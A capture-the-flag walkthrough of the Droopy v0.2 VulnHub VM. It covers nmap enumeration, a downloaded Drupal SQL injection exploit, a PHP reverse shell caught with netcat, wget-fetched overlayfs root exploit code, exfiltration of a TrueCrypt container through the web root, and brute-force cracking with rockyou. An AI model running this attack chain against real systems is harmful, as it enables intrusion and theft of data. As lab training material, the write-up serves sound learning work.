Droopy v0.2

For my first ever VulnHub VM I’m going to dive into Droopy v0.2

To get started visit the Droopy v0.2 VulHub page here
And download a copy of the VM here

The only 2 hints you’ll get are:

1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.

Special thanks go out to knightmare for all their work on this VM

Now first things first – start up the Droopy VM and if all goes to plan it should pick up a local IP from your DHCP server. In my case this will be in the 192.168.1.0/24 range

There’s lots of different methods to scan your network and pick up hosts.. some are better than others as far as stealth goes, but in my case I stuck to the reliable Swiss army knife nmap and just did a basic ping scan

# nmap -sn 192.168.1.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-02 14:44 EDT
Nmap scan report for droopy.home (192.168.1.82)

Right, now that we know our target.. what to do next? Enumerate of course! Back to nmap and we can do a quick check of what ports are open and what services are running on this specific host. Again there’s lots of options and it’s always good to read all the walkthroughs to get an insight as to how others approach each hurdle.

# nmap -A 192.168.1.82

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-02 15:49 EDT
Nmap scan report for droopy.home (192.168.1.82)
Host is up (0.0013s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 08:00:27:EA:17:7D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0
Network Distance: 1 hop

Based on the nmap results we know the VM has the following;

– Port 80/tcp open
– Apache httpd 2.4.7 ((Ubuntu))
– Drupal 7
– List of interesting files and folders extracted from http-robots.txt

Given that port 80 is open, a quick look at http://192.168.1.82 shows us a logon page. Reviewing our nmap enumeration, we see a file called CHANGELOG.txt which could be interesting and after a quick review we can make an assumption that the web server is running “Drupal 7.30, 2014-07-24”

NOTE – It’s worth a mention that I did try brute forcing the logon at this point with no success – within a minute my IP was locked out. I’m not sure how long for as I just reverted the VM and went back to work

So this is good. We have a definite starting point in which to base our attack. Now comes the essential part – more research.

A quick search on https://exploit-db.com for Drupal 7 reveals a potential SQL Injection vector. Lets give it a try..

Drupal Core <= 7.32 – SQL Injection (2)
EDB-ID: 34992
CVE: 2014-3704…
OSVDB-ID: 113371
Author: Claudio Viviani
Published: 2014-10-17

From your terminal we need to wget the code, make it executable and then run it against our target

# wget –O 34992.py https://www.exploit-db.com/download/34992
# chmod 755 34992.py
# python ./34992.py -t http://192.168.1.82 -u 8bit -p 8bit

If all goes well, we should now have a new Drupal account on the server and receive confirmation similar to the screenshot below.

Exploit Drupal 001
So where to next? At this point it’s a good idea to reward yourself with a cold beer, but don’t get too carried away, this journey has only just begun. Next step is to log on with our newly created magical credentials and see what our options may be. In my case I have never used Drupal before so it’s a good time to explore and get used to the lay of the land.

After a bit of casual strolling through the various settings I noticed a module called ‘PHP Filter’. The description reads ‘Allows embedded PHP code/snippets to be evaluated’. I’m pretty new to this, but that doesn’t sound like a good thing..

Enable php 001
I enabled the PHP filter, Saved Configuration and then and gave my newly created account rights through the permissions link, making sure to click Save Permissions before I continue. Then I created a new post using setting the type as PHP and pasting the reverse shell code from http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Remember to change the following settings on lines 49 and 50 of this particular reverse shell to your attacking machine

$ip = ‘127.0.0.1’; // CHANGE THIS
$port = 1234; // CHANGE THIS

Then set up a netcat listener on your attacking machine with

# nc –nlvp 4747

Now fingers crossed, post or preview your update making sure to set the Text Format type to ‘PHP code’ and if the code is good you should see the following connection back to your attacking machine – we have a shell! It’s okay in this scenario, but keep in mind outbound firewalling (aka egress filtering) as this may prevent your reverse shell connection reaching you.  Pick a port that’s allowed through Firewall where possible.

I’ll do a separate post of Linux Post Exploitation commands, but in this case we’ll do a quick check of our current account with the id command

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

In this case I can see that the user name of the owner of the current session is www-data. And while I’m here I do a quick check of the kernel, hardware, etc with

$ uname -a

shell created 001

So this is good isn’t it? We have a shell on the target machine, but we need more! We need to escalate our privileges and make sure we’re at the sharp end of the stick. So where do we go from here?

Before continuing  I did a quick browse through the system, and based on the original VM clue “It’s fun to read other peoples email” the /var/mail/ directory caught my attention. So I took a quick peek at the contained file and made some notes

$ ls /var/mail
$ cat /var/mail/www-data

The two observations that I took away from it were:

  • The password isn’t longer than 11 characters
  • We know what academy we went to

Based on this I decided to create a custom wordlist from any entries containing the word ‘academy’ BUT I screwed up and didn’t notice my mistake… I basically ran the following

$ cat rockyou.txt |grep acadamy >> daves_rockyou.txt

And that was my downfall. A serious lack of attention to detail, and that’s always going to be your (my) downfall in this game. Long story short, when It came time to try and bruteforce the TrueCrypt container.. it failed. My custom world list was based on ‘acadamy’ and what I should have typed was ‘academy’ – So there’s a lesson learnt there. But anyway back to the here and now – I have some clues to work with from the email message in www-data but i’m still not root, so lets move this along.

I needed to get back on track and get my bearings. First step for me is to check what the target is running and obtain the kernel version.

$ uname -r
3.13.0-43-generic

The resulting output in this case can be interpreted as follows:

3 – Kernel Version
13 – Major Revision
43 – Minor Revision

To establish what distro is running on the target machine I ran the following

$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

A quick search on www.exploit-db.com quickly turns up a few options to explore, but the one chosen this time is the overlayfs Local Root Exploit full details and code are at https://www.exploit-db.com/exploits/37292/

Next I right click and copy the source link to download the exploit, then on the target machine run the following (first attempt failed due to lack of permission to write – changed into TMP directory and re-ran.. much better). Then used gcc (GNU Compiler Collection) to compile the source code for execution

$ cd tmp
$ wget -O 37292.c https://www.exploit-db.com/download/37292

$ gcc 37292.c -o 37292
$ ./37292

./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# python -c ‘import pty ; pty.spawn(“/bin/bash”)’
python c ‘import pty ; pty.spawn(“/bin/bash”)’

# whoami
root

Bingo – that’s what we needed. We now have root on the target machine, but this roller coaster’s still moving so there’s no time to celebrate just yet. There’s more work to be done.

A quick peek in the /root folder shows a lonesome file called dave.tc and a quick google shows this to be a TrueCrypt virtual encrypted disk (container), so I decide to download it to my Kali box for further analysis. To do this I chose to move it into a web accessible directory and then just download it straight from a browser – Note, I should have used cp (copy) instead of mv (move) to avoid ‘detection’.

# mv dave.tc /var/www/html/dave.tc

Thne in a browser I opened http://192.168.1.82/dave.tc to download the file

Now on my Kali box and feeling exceedingly confident I ran TrueCrack (a bruteforce password cracker for Truecrypt volumes) against the dave.tc container using my previously created custom wordlist.

# truecrack -t dave.tc -k sha512 -w daves_rockyou.txt

And you guessed it. It failed.. oh dear. At this point I should have checked and picked up on the spelling mistake, but I didn’t. So confused but not defeated I moved on to the other clue that the password wasn’t longer than 11 characters. I had another crack at it, this time generating a new list which only contained passwords 11 characters long to minimise processing time and crossed my fingers

# pw-inspector -i rockyou.txt -m 11 -M 11 -o daves-11.txt
# truecrack -t dave.tc -k sha512 -w daves-11.txt -v

My own fault but I had to leave this to run overnight – yeah I’ve got a slow machine, but when I woke up in the morning with a fresh cup of coffee in hand, the password was smiling sweetly back at me – etonacademy

Now we have the password for the TrueCrypt container we need to mount it and see what we can find.

# cryptsetup open –type tcrypt dave.tc dave
Enter passphrase: etonacademy

Now this is where I have to apologise, the following steps worked for me, but being new to Linux i’m not sure this is the best way.. I’ll look more into it, but from here I made a new directory called /mnt/dave (the same name I gave in the cryptsetup process) in which to mount the volume. Then ran the mount command.

# mkdir /mnt/dave
# mount /dev/mapper/dave /mnt/dave
# cd dave
# ls -l
total 14
drwxr-xr-x 2 root root 1024 Apr 12 07:54 buller
drwx—— 2 root root 12288 Apr 12 07:53 lost+found
drwxr-xr-x 2 root root 1024 Apr 12 07:58 panama

First glance returns very little in the listed 3 directories, two small images, but don’t seem suspicious (just yet) so before I waste too much time with Stenography I’ll do some more digging.

Ahh.. So I was just running ls -a in the /mnt/dave/buller folder with no luck, then I ran it back in the /mnt/dave folder and just found a hair in my milkshake!!. something I should have checked the first time around (mental note for future).

# ls -la
drwxr-xr-x 4 8bit staff 136 12 Apr 13:02 .secret
drwxr-xr-x 3 8bit staff 102 12 Apr 12:54 buller
drwxr-xr-x 2 8bit staff 68 12 Apr 12:53 lost+found
drwxr-xr-x 3 8bit staff 102 12 Apr 12:58 panama

So this in interesting and unexpected, we have a new folder called .secret so lets do some more digging.. You wont catch me out twice.. This time I did another ls -la and There’s two folders, one of them hidden again

# ls -la
drwxr-xr-x 3 8bit staff 102 12 Apr 13:16 .top
-rw-r–r– 1 8bit staff 61118 25 Feb 08:57 piers.png

BOOM! It’s party pizza time. I was just about to start grabbing all the images out of this encrypted volume in preparation for further analysis, but there was no need.. and I wont upload them here. I just took a look inside the /mnt/dave/.secret/.top folder and what do you know – flag.txt

screenshot_012time_to_relax

Short on time? Then here’s the summary

Gameplay:

Enumerate target and services
Gain access to Drupal with SQL Injection
Eploit Drupal with PHP Reverse Shell
Escalate to Root through Overlayfs exploit
Obtain and bruteforce access to TrueCrypt container
Pillage and capture hidden flag

Exploits used:

CVE-2014-3704 – Drupal 7 SQL Injection
PHP-Reverse-Shell
CVE-2015-1328 – Overlayfs Local Root

Websites, Tools and Commands Used:

https://www.exploit-db.com
http://pentestmonkey.net
nmap
wget
chmod
netcat (nc)
whoami
id
gcc
TrueCrack
pw-inspector
cryptsetup
mkdir
mount
ls

Well that feels good.. big shout out to the boys and girls at www.top-hat-sec.com – If you ever want to learn from passionate like minded people, this is the place to be. No rest for the wicked, time for a quick beer then on to the next VM

screenshot_011

8bit kiwi

About the author